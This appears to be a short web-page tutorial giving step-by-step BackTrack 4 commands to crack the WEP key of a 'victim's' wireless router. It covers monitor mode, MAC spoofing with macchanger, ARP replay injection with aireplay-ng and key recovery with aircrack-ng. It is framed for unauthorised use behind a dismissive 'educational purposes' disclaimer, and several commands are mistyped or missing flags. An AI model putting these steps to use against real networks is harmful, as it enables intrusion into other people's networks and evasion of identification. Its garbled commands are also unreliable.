(adsbygoogle = window.adsbygoogle || []).push({}); *Disclaimer: This is for educational purposes, if you get caught for doing this it's your own fault.*

You will need BackTrack 4. Download Link., next you will need to burn it onto a CD. If you don't know how to do that then just stop right now.

Login: root
Password: toor

Once logged in type: "startx"

1. Open the console and type in this to start network connections:

/etc/init.d/networking start


2. Now you will put the network card into monitor mode:

airmon-ng


3. Now to start the scan(Note: use either wlan0 or wlan1):

airmon-ng start wlan0 or 1


4. Time to spoof your MAC address with:

ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up


5. Now to find your victims router:

airodump-ng mon0


6. Once you've found one copy the BSSID and get out of airodump with:

airodump-ng -c "channel number", --bssid "The BSSID of the router", -w "What you want to save the cape file as" mon0"


Example:

airodump-ng -c 1 -- bssid 11:22:33:44:55:66 -w wepcap mon0


7. Now to start cracking:

aireplay-ng -1 1 -a "The BSSID of the router" mon0


Example:

aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0


8. To continue the ARP cycle open another console and type:

aireplay-ng -3 -b "The BSSID of the router" mon0


Collect a large amount of IVs, between 20,000 and 50,000

9. To crack the cap open another console and type:

aircrack-ng -b "The BSSID of the router" "File Name"-01.cap


Example:

aircrack-ng 11:22:33:44:55:66 wepcap-01.cap


10. You should now have the key for the router, enjoy.